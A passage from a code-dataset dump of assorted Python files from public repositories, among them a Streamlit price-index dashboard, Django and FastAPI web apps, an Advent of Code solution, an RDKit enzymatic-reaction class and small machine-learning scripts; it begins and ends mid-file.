st.sidebar.selectbox('Select Category for Time Series Decomposition', list(categories_dict.keys()))\r\n selected_commodity_decompose = st.sidebar.selectbox('Select Commodity for Time Series Decomposition', ['Entire Category'] + list(categories_dict[selected_category_decompose].columns))\r\n\r\n if selected_commodity_decompose == 'Entire Category':\r\n decomposed = decompose_time_series(categories_dict[selected_category_decompose], selected_category_decompose)\r\n else:\r\n decomposed = decompose_time_series(categories_dict[selected_category_decompose], selected_commodity_decompose)\r\n\r\n # Plotting the decomposed time series\r\n st.header(\"Tend: \")\r\n st.write(\"Trend Analysis helps us identify the long-term movement or direction in the time series data.\")\r\n st.write(\"It provides insights into whether the data is increasing, decreasing, or stable over time.\")\r\n st.header(\"Residual: \")\r\n st.write(\"Residual Analysis examines the differences between observed values and the values predicted by the trend and seasonal components.\")\r\n st.write(\"It helps us understand the randomness or unexplained variability in the data.\")\r\n \r\n st.header(\"Seasionality: \")\r\n st.write(\"Seasonality Analysis identifies repetitive patterns or cycles in the data that occur at regular intervals.\")\r\n st.write(\"It helps us understand whether the data exhibits seasonality (repeating patterns) or not.\")\r\n \r\n trend_component = decomposed.trend\r\n plt.figure(figsize=(12,6))\r\n plt.plot(categories_dict[selected_category_decompose].index, trend_component)\r\n plt.xlabel('Time')\r\n plt.ylabel('Trend Component')\r\n plt.title(f'Trend Analysis of commodity {selected_commodity_decompose} WPI')\r\n st.pyplot(plt)\r\n \r\n \r\n res_component = decomposed.resid\r\n plt.figure(figsize=(12,6))\r\n plt.plot(categories_dict[selected_category_decompose].index, res_component)\r\n plt.xlabel('Time')\r\n plt.ylabel('Residual Component')\r\n plt.title(f'Residual Analysis of commodity {selected_commodity_decompose} WPI')\r\n st.pyplot(plt)\r\n \r\n season_component = decomposed.seasonal\r\n plt.figure(figsize=(12,6))\r\n plt.plot(categories_dict[selected_category_decompose].index, season_component)\r\n plt.xlabel('Time')\r\n plt.ylabel('Seasion Component')\r\n plt.title(f'Seasionality Analysis of commodity {selected_commodity_decompose} WPI')\r\n st.pyplot(plt)\r\n \r\n if selected_commodity_decompose != 'Entire Category':\r\n seasonality_test_result = 'Stationary' if decomposed.seasonal.dropna().std() < 0.1 else 'Seasonal'\r\n st.header(f\"The '{selected_commodity_decompose}' commodity is likely {seasonality_test_result}.\")\r\n\r\n \r\ndef inflation_plot():\r\n st.title('Over all Inflation rate Trend')\r\n monthly_inflation_rate = data['ALL COMMODITIES'].pct_change() * 100\r\n yearly_inflation_rate = data['ALL COMMODITIES'].pct_change(12) * 100\r\n yearly_inflation_rate.dropna(inplace=True)\r\n \r\n plt.figure(figsize=(10, 6))\r\n plt.plot(yearly_inflation_rate.index, yearly_inflation_rate, label='Yearly General Inflation Rate', color='red')\r\n plt.title('Yearly Inflation Rate Over Time')\r\n plt.xlabel('Time')\r\n plt.ylabel('Inflation Rate (%)')\r\n plt.axhline(0, color='black', linewidth=0.5) # Add horizontal line at y=0\r\n plt.legend(loc='best')\r\n st.pyplot(plt)\r\n \r\ndef time_series_forecasting():\r\n st.title('Time Series Forecasting')\r\n st.write(\"Time series forecasting involves predicting future values based on past data.\")\r\n st.write(\"In this process, the model learns patterns and trends from historical data to make future predictions.\")\r\n\r\n selected_category_tf = st.sidebar.selectbox('Select Category for Time series Forecasting', list(categories_dict.keys()))\r\n selected_commodity_tf = st.sidebar.selectbox('Select Commodity for Time series Forecasting', ['General Index'] + ['Entire Category'] + list(categories_dict[selected_category_tf].columns))\r\n \r\n if selected_commodity_tf == 'General Index':\r\n forecasting_data = data['ALL COMMODITIES'].values\r\n elif selected_commodity_tf == 'Entire Category':\r\n forecasting_data = data[selected_category_tf].values\r\n else:\r\n forecasting_data = data[selected_commodity_tf].values\r\n \r\n forecasting_data = forecasting_data.reshape(-1, 1)\r\n\r\n scaler = MinMaxScaler(feature_range=(0, 1))\r\n data_scaled = scaler.fit_transform(forecasting_data)\r\n\r\n # Create X, y datasets\r\n X, y = [], []\r\n for i in range(10, len(data_scaled)):\r\n X.append(data_scaled[i-10:i, 0])\r\n y.append(data_scaled[i, 0])\r\n\r\n X, y = np.array(X), np.array(y)\r\n\r\n # Reshape X to be [samples, time steps, features]\r\n X = np.reshape(X, (X.shape[0], X.shape[1], 1))\r\n \r\n model = Sequential()\r\n model.add(LSTM(50, input_shape=(X.shape[1], 1)))\r\n model.add(Dense(1))\r\n\r\n model.compile(optimizer='adam', loss='mean_squared_error')\r\n model.fit(X, y, epochs=20, batch_size=1, verbose=2)\r\n \r\n predictions = model.predict(X)\r\n predictions = scaler.inverse_transform(predictions) # Reverting scaling\r\n plt.figure(figsize=(10, 6))\r\n plt.plot(forecasting_data, label='True')\r\n plt.plot(np.arange(10, len(forecasting_data)), predictions, label='Predicted')\r\n plt.legend()\r\n st.pyplot(plt)\r\n \r\n future_steps = 8 # to predict the next three months\r\n input_sequence = X[-1] # the last sequence in the dataset\r\n\r\n predictions_future = []\r\n\r\n for _ in range(future_steps):\r\n # Use last sequence to predict the next value\r\n predicted = model.predict(input_sequence.reshape(1, -1, 1))\r\n\r\n # Append predicted value to the input_sequence\r\n input_sequence = np.append(input_sequence, predicted)\r\n\r\n # Remove the first value of the sequence to maintain the sequence length\r\n input_sequence = input_sequence[1:]\r\n\r\n # Append the predicted value to the list of future predictions\r\n predictions_future.append(scaler.inverse_transform(predicted)[0, 0])\r\n \r\n plt.figure(figsize=(10, 6))\r\n plt.plot(range(len(forecasting_data)), forecasting_data, label='True')\r\n plt.plot(range(len(forecasting_data), len(forecasting_data) + future_steps), predictions_future, label='Forecasted', linestyle='dashed')\r\n plt.legend()\r\n st.pyplot(plt)\r\n \r\n future_direction = \"increase\" if predictions_future[-1] > predictions_future[0] else \"decrease\" if predictions_future[-1] < predictions_future[0] else \"remain the same\" \r\n st.write(f\"The forecasted values for the next coming months are likely to {future_direction}.\")\r\n \r\n \r\ndef home_page():\r\n # Create a Streamlit app title\r\n st.title(\"Wholesale Price Index Dataset Advanced Data Analysis\")\r\n # Heading for WPI Definition\r\n st.header(\"Definition of Wholesale Price Index (WPI)\")\r\n st.write(\"The Wholesale Price Index (WPI) is a measure of the average change in the prices of a basket of goods and services typically traded in bulk at the wholesale level. It is used to track inflation and economic trends.\")\r\n st.write(\"The formula for calculating the WPI is as follows:\")\r\n st.latex(r'WPI = \\frac{\\sum(P_{i} \\cdot W_{i})}{\\sum(W_{i})}')\r\n \r\n # Bullet Points for Interpretation\r\n st.header(\"Interpreting WPI Data\")\r\n st.write(\"You can interpret WPI data in the following ways:\")\r\n st.markdown(\"- **Inflation Analysis**: WPI helps in monitoring inflation trends by tracking changes in wholesale prices over time.\")\r\n st.markdown(\"- **Economic Trends**: WPI data can provide insights into the overall health of the economy, as rising prices may indicate economic growth or overheating.\")\r\n st.markdown(\"- **Sector-Specific Analysis**: WPI can be used to analyze price movements in specific sectors, helping businesses and policymakers make informed decisions.\")\r\n\r\n st.header(\"Sample Data (First 5 Rows)\")\r\n st.dataframe(data.head(5))\r\n \r\n heatmap_page1()\r\n clustering_page()\r\n \r\ndef main():\r\n st.sidebar.title('Navigation')\r\n pages = {\r\n \"Home Page\":home_page,\r\n \"Trend Visualization\": trend_visualization_page,\r\n \"Calculate Volatility\": calculate_volatility_page,\r\n \"Correlation Analysis\": correlation_analysis_commodity,\r\n \"Inflation Analysis\": monthy_yearly_rate_change_analysis,\r\n \"Timeseries Analysis\": time_series_analysis,\r\n \"Timeseries Forecasting\":time_series_forecasting\r\n }\r\n \r\n selected_page = st.sidebar.radio(\"Go to\", list(pages.keys()))\r\n pages[selected_page]()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"SurajB52/cpi_and_wpi_visualization","sub_path":"wpi_dashboard_v2.py","file_name":"wpi_dashboard_v2.py","file_ext":"py","file_size_in_byte":20630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31292274439","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nservice_object = Service(\"C:\\Drivers\\chromedriver.exe\")\nbrowser = webdriver.Chrome(service= service_object)\nbrowser.get(\"https://www.google.com/\")\nprint(browser.title)\nurl1 = browser.title\nprint(browser.current_url)\nurl = browser.current_url\nif url == url1:\n print(\"url is correct\")\nelse:\n print(\"bad\")\n\n","repo_name":"halovivek/yearcoding","sub_path":"07092022_selenium2.py","file_name":"07092022_selenium2.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31369738367","text":"from django.http.response import Http404\nfrom django.shortcuts import HttpResponse\nfrom .models import NeedType, Lead, State, District\nfrom covid.renderer import renderView\nimport gspread\nimport json\nfrom covid import env\nfrom fuzzywuzzy import process\n\n\ndef getState(state):\n state_list = State.objects.values_list(\"name\")\n state_list = [i[0] for i in state_list]\n Ratios = process.extract(state, state_list)\n finalvalue = max(Ratios, key=lambda x: x[1])\n stateobj = State.objects.get(name=finalvalue[0])\n return stateobj\n\n\ndef getDistrict(district):\n district_list = District.objects.values_list(\"name\")\n district_list = [i[0] for i in district_list]\n Ratios = process.extract(district, district_list)\n finalvalue = max(Ratios, key=lambda x: x[1])\n if(finalvalue[1] < 80):\n return False\n districtobj = District.objects.get(name=finalvalue[0])\n return districtobj\n\n\ndef index(request):\n needs = NeedType.objects.all()\n return renderView(request, 'needs.html', {\"needs\": needs})\n\n\ndef needs(request, need=None):\n try:\n itemFrom = int(request.POST['from'])-1\n itemTo = int(request.POST['till'])\n if itemTo < 10:\n itemTo = 10\n except:\n itemFrom = 0\n itemTo = 10\n try:\n needobj = NeedType.objects.get(id=need)\n if needobj.mapsrc:\n return renderView(request, 'leads.html', {\n 'need': needobj\n })\n states = []\n districts = []\n resources = []\n try:\n statename = str(request.GET['state'])\n state = State.objects.get(name=statename)\n except:\n states = State.objects.all()\n state = None\n\n district = None\n if state:\n districts = District.objects.filter(state=state)\n try:\n distname = str(request.GET['district'])\n district = districts.get(name=distname)\n except:\n district = None\n\n if district:\n resources = Lead.objects.filter(needtype=needobj, state=state, district=district).order_by(\n '-lastupdate')[itemFrom:itemTo]\n totalleads = Lead.objects.filter(\n needtype=needobj, state=state, district=district).count()\n elif state:\n resources = Lead.objects.filter(needtype=needobj, state=state).order_by(\n '-lastupdate')[itemFrom:itemTo]\n totalleads = Lead.objects.filter(\n needtype=needobj, state=state).count()\n else:\n resources = Lead.objects.filter(needtype=needobj).order_by(\n '-lastupdate')[itemFrom:itemTo]\n totalleads = Lead.objects.filter(needtype=needobj).count()\n\n if itemTo > totalleads:\n itemTo = totalleads\n data = {\n 'leads': resources,\n 'need': needobj,\n \"states\": states,\n \"districts\": districts,\n \"state\": state,\n \"district\": district,\n \"from\": itemFrom+1,\n \"till\": itemTo,\n \"totalleads\": totalleads\n }\n return renderView(request, 'leads.html', data)\n except:\n raise Http404()\n\n\ndef addwithDistrict(sr_no, district, state, need, lead):\n if(sr_no.strip() != \"\"):\n uuid = lead[\"UUID\"]\n if(uuid.strip() == \"\"):\n oxygenobj = Lead.objects.create(\n needtype=need, provider=lead[\"Provider\"], contact=lead[\"Contact\"], state=state, district=district, address=lead[\"Address\"], name=lead[\"Name\"])\n oxygenobj.save()\n return oxygenobj, True\n else:\n try:\n oxygenobj = Lead.objects.get(id=uuid)\n oxygenobj.needtype = need\n oxygenobj.provider = lead[\"Provider\"]\n oxygenobj.contact = lead[\"Contact\"]\n oxygenobj.state = state\n oxygenobj.district = district\n oxygenobj.address = lead[\"Address\"]\n oxygenobj.save()\n return oxygenobj, False\n except:\n return False, False\n\n\ndef addwithoutDistrict(sr_no, state, need, lead):\n obj = getState(state)\n if(obj != False):\n state = obj\n if(sr_no.strip() != \"\"):\n uuid = lead[\"UUID\"]\n if(uuid.strip() == \"\"):\n oxygenobj = Lead.objects.create(\n needtype=need, provider=lead[\"Provider\"], contact=lead[\"Contact\"], state=state, address=lead[\"Address\"], name=lead[\"Name\"])\n oxygenobj.save()\n return oxygenobj, True\n else:\n try:\n oxygenobj = Lead.objects.get(id=uuid)\n oxygenobj.needtype = need\n oxygenobj.provider = lead[\"Provider\"]\n oxygenobj.contact = lead[\"Contact\"]\n oxygenobj.state = state\n oxygenobj.address = lead[\"Address\"]\n oxygenobj.save()\n return oxygenobj, False\n except:\n return False, False\n\n\ndef delRajat():\n objs = Lead.objects.filter(provider=\"Rajat Air Products\")\n for i in objs:\n i.delete()\n\n\ndef addLeads(request):\n output_list = []\n try:\n key = request.GET[\"key\"]\n if(str(key) != str(env.PROJECTKEY)):\n return Http404()\n except:\n return Http404()\n print(\"Processing data retrieval\")\n newlyadded = 0\n updated = 0\n try:\n gc = gspread.service_account(filename=env.GOOGLE_CRED)\n sh = gc.open_by_key(env.SPREADSHEETID)\n need_types = NeedType.objects.all()\n for need in need_types:\n try:\n Worksheet = sh.worksheet(need.type.capitalize())\n output_list.append(f\"Worksheet found: {need.type}\")\n except:\n output_list.append(f\"Worksheet not found: {need.type}\")\n continue\n res = Worksheet.get_all_records()\n for i in res:\n sr_no = str(i[\"Sr. No.\"])\n try:\n if(i[\"District\"].strip() == \"\"):\n raise Exception\n districts = str(i[\"District\"]).split(\",\")\n for dis in districts:\n obj = getDistrict(dis)\n if(obj == False):\n newobj, is_added = addwithoutDistrict(\n sr_no, i[\"State\"], need, i)\n if newobj:\n Worksheet.update_cell(\n int(sr_no)+1, 2, str(newobj.id))\n if(is_added):\n output_list.append(\n f'Record created: {newobj.provider} : {need.type}')\n newlyadded += 1\n else:\n output_list.append(\n f\"Record updated: {newobj.provider} : {need.type}\")\n updated += 1\n else:\n district, state = obj, obj.state\n\n newobj, is_added = addwithDistrict(\n sr_no, district, state, need, i)\n if newobj:\n Worksheet.update_cell(\n int(sr_no)+1, 2, str(newobj.id))\n if(is_added):\n output_list.append(\n f'Record created: {newobj.provider} : {need.type}')\n newlyadded += 1\n else:\n output_list.append(\n f\"Record updated: {newobj.provider} : {need.type}\")\n updated += 1\n except Exception as e:\n print(e)\n states = str(i[\"State\"]).split(\",\")\n for sts in states:\n newobj, is_added = addwithoutDistrict(\n sr_no, sts, need, i)\n if newobj:\n Worksheet.update_cell(\n int(sr_no)+1, 2, str(newobj.id))\n if(is_added):\n output_list.append(\n f'Record created: {newobj.provider} : {need.type}')\n newlyadded += 1\n else:\n output_list.append(\n f\"Record updated: {newobj.provider} : {need.type}\")\n updated += 1\n\n except Exception as e:\n print(e)\n output_list.append(\"Some error occured\")\n response = \",\".join(i for i in output_list)\n print(*(response.split(\",\")), sep=\"\\n\")\n return HttpResponse(response)\n\n\ndef fetchState(request):\n state = list(State.objects.values_list(\"name\", flat=True))\n print(state)\n return HttpResponse(json.dumps(state))\n","repo_name":"Knotters/covidcare","sub_path":"needs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9281,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"21997103127","text":"from pydantic import BaseModel, Field\nfrom fastapi.encoders import jsonable_encoder\n\nmock_db: dict[int, object] = {}\n\n\nclass Item(BaseModel):\n id: int | None\n name: str | None = Field(title=\"The name of the item\",\n max_length=100, min_length=1)\n description: str | None = Field(\n default=None, title=\"The description of the item\",\n max_length=300, min_length=1\n )\n\n class Config:\n schema_extra = {\n \"example\": {\n \"name\": \"foo\",\n \"description\": \"bar\",\n }\n }\n\n\nclass Repo:\n def __init__(self) -> None:\n self.counter: int = 0\n\n def create(self, item: Item):\n self.counter += 1\n item.id = self.counter\n mock_db[self.counter] = jsonable_encoder(item)\n return item\n\n def get(self, id: int):\n return Item(**mock_db.get(id, {}))\n\n def update(self, id: int, item: Item):\n current_val = Item(**mock_db[id])\n update_data = item.dict(exclude_unset=True)\n updated_val = current_val.copy(update=update_data)\n print(current_val)\n print(updated_val)\n mock_db[id] = jsonable_encoder(updated_val)\n return updated_val\n\n def delete(self, id: int):\n return Item(**mock_db.pop(id, {}))\n\n\ndb = Repo()\n","repo_name":"dotdak/example","sub_path":"fast-api-template/src/repo/item_repo.py","file_name":"item_repo.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27823489800","text":"\"\"\"Enzymatic reaction representation.\"\"\"\nimport re\nfrom typing import List, Any\nfrom .chemical_reaction import ChemicalReaction\nfrom rdkit.Chem import AllChem as rdk\nfrom rdkit.Chem.rdchem import Mol\n\nUNKNOWN_CHEMICAL_REGEX = re.compile(r\"^(<.*>)$|^(<)|(>)$\")\n\n\nclass EnzymaticReaction(ChemicalReaction):\n \"\"\"Representation of an enzymatic reaction.\n\n Reactions containing enzyme are represented as reaction SMILES using a '|'\n to separate precursors from the EC number.\n \"\"\"\n\n def __init__(\n self,\n enzymatic_reaction_smiles: str,\n remove_duplicates: bool = True,\n sanitize: bool = True,\n source: str = \"unknown\",\n **kwargs: Any,\n ):\n \"\"\"Constructor for EnzymaticReaction.\n\n Args:\n enzymatic_reaction_smiles: an enzymatic reaction SMILES.\n remove_duplicates: duplicate removal. Defaults to True.\n sanitize: whether sanitization is enabled. Defaults to True.\n source: source for the enzymatic reaction. Defaults to \"unknown\".\n \"\"\"\n vals = re.split(r\">|\\|\", enzymatic_reaction_smiles)\n if len(vals) < 2:\n vals.append(\"\")\n\n self.ec: List[str] = [level.strip() for level in vals[1].split(\".\")]\n self.source = source\n\n # hack\n self.kwargs = kwargs\n\n super().__init__(\n enzymatic_reaction_smiles.replace(f\"|{vals[1]}\", \"\"),\n remove_duplicates,\n sanitize,\n **kwargs,\n )\n\n def __str__(self) -> str:\n \"\"\"Returns the extended reaction SMARTS of this instance (reactants|ec>agents>products).\n\n Returns:\n the extended reaction SMARTS representing this instance.\n \"\"\"\n s = (\n \".\".join(\n sorted([rdk.MolToSmiles(m, **self.kwargs) for m in self.reactants if m])\n )\n + \">\"\n + \".\".join(\n sorted([rdk.MolToSmiles(m, **self.kwargs) for m in self.agents if m])\n )\n + \">\"\n + \".\".join(\n sorted([rdk.MolToSmiles(m, **self.kwargs) for m in self.products if m])\n )\n )\n s_parts = s.split(\">\")\n\n if len(self.ec) > 0 and self.ec[0] != \"\":\n s_parts[0] += f'|{\".\".join(self.ec)}'\n return \">\".join(s_parts).replace(\" \", \"\")\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Compares the count, order, and SMILES string of each molecule in this reaction as well as the EC.\n\n Args:\n other: another EnzymaticReaction instance to be compared with this instance.\n\n Returns:\n whether this instance is equal to another.\n \"\"\"\n if not isinstance(other, EnzymaticReaction):\n raise NotImplementedError(\n \"EnzymaticReaction can be tested for equality with EnzymaticReaction objects\"\n )\n return super().__eq__(other) and self.ec == other.ec\n\n def __hash__(self) -> int:\n \"\"\"Get hash for the enzymatic reaction.\n\n Returns:\n enzymatic reaction hash.\n \"\"\"\n return hash(str(self))\n\n def mol_to_smiles(self, mol: Mol) -> str:\n \"\"\"Applies the kwargs supplied to the reaction to MolToSmiles for a given molecule.\n\n Args:\n mol: an RDKit molecule instance.\n\n Returns:\n the string representing the molecule.\n \"\"\"\n return rdk.MolToSmiles(mol, **self.kwargs)\n\n def to_string(self, ec_depth: int = 4) -> str:\n \"\"\"Get the string representing this reaction with a certain number of EC levels.\n\n Args:\n ec_depth: the number of EC classes to include (top-down). Defaults to 4.\n\n Returns:\n the string representing this reaction with the chosen levels of EC.\n \"\"\"\n cpy = EnzymaticReaction(str(self))\n cpy.ec = cpy.ec[:ec_depth]\n return str(cpy).strip()\n\n def get_ec(self, ec_depth: int = 4) -> str:\n \"\"\"Get the string representing the EC of this reaction.\n\n Args:\n ec_depth: the number of EC classes to include (top-down). Defaults to 4.\n\n Returns:\n the EC of the reaction as a string.\n \"\"\"\n return \".\".join(self.ec[:ec_depth]).strip()\n\n def reverse(self) -> \"EnzymaticReaction\":\n \"\"\"Reverses the reaction (switching reactants and products).\n\n Returns:\n the reversed enzymatic reactions.\n \"\"\"\n return EnzymaticReaction.from_smarts_and_ec(\n f\"{'.'.join(self.get_products_as_smiles())}>>{'.'.join(self.get_reactants_as_smiles())}\",\n self.get_ec(),\n self.source,\n )\n\n @staticmethod\n def from_smarts_and_ec(\n reaction_smiles: str, ec: str, source: str = \"unknown\"\n ) -> \"EnzymaticReaction\":\n \"\"\"Creates an EnzymaticReaction instance from a reaction SMILES and an EC number.\n\n Args:\n reaction_smiles: a reaction SMILES.\n ec: EC number string representation.\n source: source for the enzymatic reaction. Defaults to \"unknown\".\n\n Returns:\n an EnzymaticReaction instance.\n \"\"\"\n split = reaction_smiles.split(\">>\")\n return EnzymaticReaction(split[0] + \"|\" + ec + \">>\" + split[1], source=source)\n\n @staticmethod\n def is_valid(enzymatic_reaction_smiles: str) -> bool:\n \"\"\"Checks whether an enzymatic reaction SMILES (e.g. O.CO|1.2.3.4>>C(=O)O) is valid.\n\n Args:\n enzymatic_reaction_smiles: an enzymatic reaction SMILES.\n\n Returns:\n a bool indicating whether the supplied enzymatic reaction SMILES is valid.\n \"\"\"\n if (\n \"|\" not in enzymatic_reaction_smiles\n or enzymatic_reaction_smiles.count(\">\") != 2\n or \"|>>\" in enzymatic_reaction_smiles\n ):\n return False\n\n return True\n","repo_name":"rxn4chemistry/biocatalysis-model","sub_path":"rxn_biocatalysis_tools/enzymatic_reaction.py","file_name":"enzymatic_reaction.py","file_ext":"py","file_size_in_byte":5889,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"77"} +{"seq_id":"13082166108","text":"import pandas as pd\nfrom sklearn import model_selection\n\n# k-fold交差検証\nif __name__ == \"__main__\":\n train_path = './wine-quality.tsv'\n df = pd.read_csv(train_path, sep='\\t')\n\n # kfoldという列を作り,-1で初期化\n df[\"kfold\"] = -1\n\n # ランダマイズ\n df = df.sample(frac=1).reset_index(drop=True)\n\n # KFoldクラスの初期化(n_splitsに分割数を与える)\n kf = model_selection.KFold(n_splits=5)\n\n # kfold列を埋めていく\n for fold, [trn_, val_] in enumerate(kf.split(X=df)):\n df.loc[val_, 'kfold'] = fold\n\n # データセットを新しい列とともに保存\n df.to_csv(\"train_folds.tsv\", index=False, sep='\\t')\n","repo_name":"unvalley/dnn-for-nlp","sub_path":"AMLP/cross-validation/kfold.py","file_name":"kfold.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32820086788","text":"import json\nimport tensorflow as tf\nfrom keras.models import load_model\nimport pickle\n\n\n# load the trained model\nmodel = load_model('chat_model')\n\n# load the training data\nwith open('intents.json') as file:\n data = json.load(file)\n\ntraining_sentences = []\ntraining_labels = []\nfor intent in data['intents']:\n for pattern in intent['patterns']:\n training_sentences.append(pattern)\n training_labels.append(intent['tag'])\n\n# encode the training labels\nwith open('label_encoder.pickle', 'rb') as ecn_file:\n lbl_encoder = pickle.load(ecn_file)\n\ntraining_labels_encoded = lbl_encoder.transform(training_labels)\n\n# tokenize and pad the training sentences\nwith open('tokenizer.pickle', 'rb') as handle:\n tokenizer = pickle.load(handle)\n\nsequences = tokenizer.texts_to_sequences(training_sentences)\npadded_sequences = tf.keras.utils.pad_sequences(sequences, truncating='post', maxlen=20)\n\n# evaluate the model\nloss, accuracy = model.evaluate(padded_sequences, training_labels_encoded)\n\n# print the accuracy\nprint('Accuracy:', accuracy)\n\n# evaluate the model\nloss, accuracy = model.evaluate(padded_sequences, training_labels_encoded)\n\n# print the accuracy\nprint('Accuracy:', accuracy)\n","repo_name":"S-Thakas/MentalHealth","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72990374010","text":"from fastapi import APIRouter, Depends\n\nfrom app.models.schemas.auth import ChangedPasswordIn\nfrom app.models.schemas.suggestions import SuggestionsForApprove\nfrom app.models.schemas.users import User, UserDataToUpdate, UserList\nfrom app.services.admin import AdminService\nfrom app.utils.deps import get_current_admin_user, pagination\nfrom app.utils.utils import propagate_args\n\nrouter = APIRouter()\n\n\n@router.get(\n \"/user/{user_id}\",\n response_model=User,\n dependencies=[Depends(get_current_admin_user)],\n)\nasync def get_user(\n user_id: int,\n service: AdminService = Depends(),\n):\n return await service.get_user_by_id(user_id)\n\n\n@router.get(\"/users\", response_model=UserList)\nasync def get_user_list(\n service: AdminService = Depends(), user: User = Depends(get_current_admin_user)\n):\n return await service.get_all_users(user)\n\n\n@router.delete(\n \"/users/{user_id}/delete\",\n dependencies=[Depends(get_current_admin_user)],\n)\nasync def delete_user(\n user_id: int,\n service: AdminService = Depends(),\n):\n uid = await service.delete_user(user_id)\n if uid:\n return {\"status\": \"Ok\"}\n else:\n return {\"status\": \"error\"}\n\n\n@router.put(\n \"/users/{user_id}/update\",\n dependencies=[Depends(get_current_admin_user)],\n)\nasync def update_user(\n user_id: int,\n user_data_to_update: UserDataToUpdate,\n service: AdminService = Depends(),\n):\n uid = await service.update_user(user_id, user_data_to_update)\n if uid:\n return {\"status\": \"Ok\"}\n else:\n return {\"status\": \"error\"}\n\n\n@router.put(\n \"/suggestions/{suggestions_id}/approve\",\n)\nasync def approve_review_suggestions(\n suggestions_id: int,\n service: AdminService = Depends(),\n user: User = Depends(get_current_admin_user),\n):\n sid = await service.approve_suggestion(suggestions_id, user)\n if sid:\n return {\"status\": \"Ok\"}\n else:\n return {\"status\": \"error\"}\n\n\n@router.put(\n \"/suggestions/{suggestions_id}/reject\",\n)\nasync def reject_review_suggestions(\n suggestions_id: int,\n service: AdminService = Depends(),\n user: User = Depends(get_current_admin_user),\n):\n sid = await service.reject_suggestion(suggestions_id, user)\n if sid:\n return {\"status\": \"Ok\"}\n else:\n return {\"status\": \"error\"}\n\n\n@router.get(\n \"/suggestions\",\n response_model=SuggestionsForApprove,\n response_model_exclude_unset=True,\n dependencies=[Depends(get_current_admin_user)],\n)\nasync def get_suggestions(\n common_args: dict = Depends(pagination),\n service: AdminService = Depends(),\n user: User = Depends(get_current_admin_user),\n):\n data, total = await service.get_all_suggestions(user, common_args)\n resp = {\"data\": data, \"total\": total}\n propagate_args(common_args, resp)\n return resp\n\n\n@router.put(\n \"/users/{users_id}/changePassword\",\n dependencies=[Depends(get_current_admin_user)],\n)\nasync def change_user_password(\n users_id: int,\n changed_password: ChangedPasswordIn,\n service: AdminService = Depends(),\n):\n uid = await service.change_user_password(users_id, changed_password)\n if uid:\n return {\"status\": \"Ok\"}\n else:\n return {\"status\": \"error\"}\n","repo_name":"blayson/sre","sub_path":"app/routes/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"8078962365","text":"import itertools\nimport operator\nimport copy\n\nglobal a\na=0\nglobal pa\npa=[]\n\ndef readData(fname):\n\tdata=[]\n\twith open(fname) as f:\n\t\tfor l in f.readlines():\n\t\t\tif l[-1]=='\\n':\n\t\t\t\tl=l[:-1]\n\n\t\t\tl=l.split('-')\n\t\t\tdata.append((l[0],l[1]))\n\treturn data\n\ndef findNodePaths(tunnels):\n\tnodePaths={}\n\tfor x in tunnels:\n\t\tnode=nodePaths[x[0]]=nodePaths.get(x[0],set())\n\t\tnode.add(x[1])\n\n\t\tnode=nodePaths[x[1]]=nodePaths.get(x[1],set())\n\t\tnode.add(x[0])\n\treturn nodePaths\n\ndef checkPaths(start, nodePaths, visited):\n\tvisited=copy.deepcopy(visited)\n\tif not all(ele.isupper() for ele in start\t):\n\t\tvisited.add(start)\n\tif start=='end':\n\t\tglobal a\n\t\ta+=1\n\t\treturn\n\tfor n in nodePaths[start]:\n\t\tif n in visited:\n\t\t\tcontinue\n\t\tcheckPaths(n, nodePaths, visited)\n\ndef checkPaths2(start, nodePaths, visited,sm,path,twice=False):\n\t#print(start,visited, twice)\n\tvisited=copy.deepcopy(visited)\n\tpath=copy.deepcopy(path)\n\tpath.append(start)\n\tif not all(ele.isupper() for ele in start\t):\n\t\tif not twice and start==sm:\n\t\t\ttwice=True\n\t#\t\tprint(\"twice: \",start)\n\t\telse:\n\t\t\tvisited.add(start)\n\t\t\n\t\tif start=='end':\n\t\t\tvisited.add(start)\n\n\tif start=='end':\n\t#\tprint(\"DONE\",path)\n\t\tglobal a\n\t\ta+=1\n\t\tpa.append(path)\n\t\tcheckPaths2.twice=False\n\t\treturn\n\tfor n in nodePaths[start]:\n\t\tif n in visited:\n\t\t\tcontinue\n\t\tcheckPaths2(n, nodePaths, visited,sm,path,twice)\n\n\ntunnels=readData('in.txt')\nnodePaths=findNodePaths(tunnels)\n\nfor n in nodePaths['start']:\n\tcheckPaths(n, nodePaths, set(['start']))\n\nprint(a)\na=0\n\nsmall =[]\nfor x in nodePaths:\n\tif not all(ele.isupper() for ele in x) and x!='start' and x!='end':\n\t\tsmall.append(x)\n\nfor n in nodePaths['start']:\n\tfor s in small:\n\t\tcheckPaths2(n, nodePaths, set(['start']),s,[])\n\n#to remove double-counted paths\ns=['-'.join(p) for p in pa]\nprint(len(set(s)))","repo_name":"piotrpodlaski/AoC","sub_path":"12/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10833385170","text":"from rest_framework import routers\nfrom rest_framework_jwt.views import obtain_jwt_token\n\nfrom django.urls import include, path\n\nfrom . import views\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'currency', views.CurrencyViewSet)\nrouter.register(r'currency_pair', views.CurrencyPairViewSet)\nrouter.register(r'user_balance', views.UserBalanceViewSet)\nrouter.register(r'order', 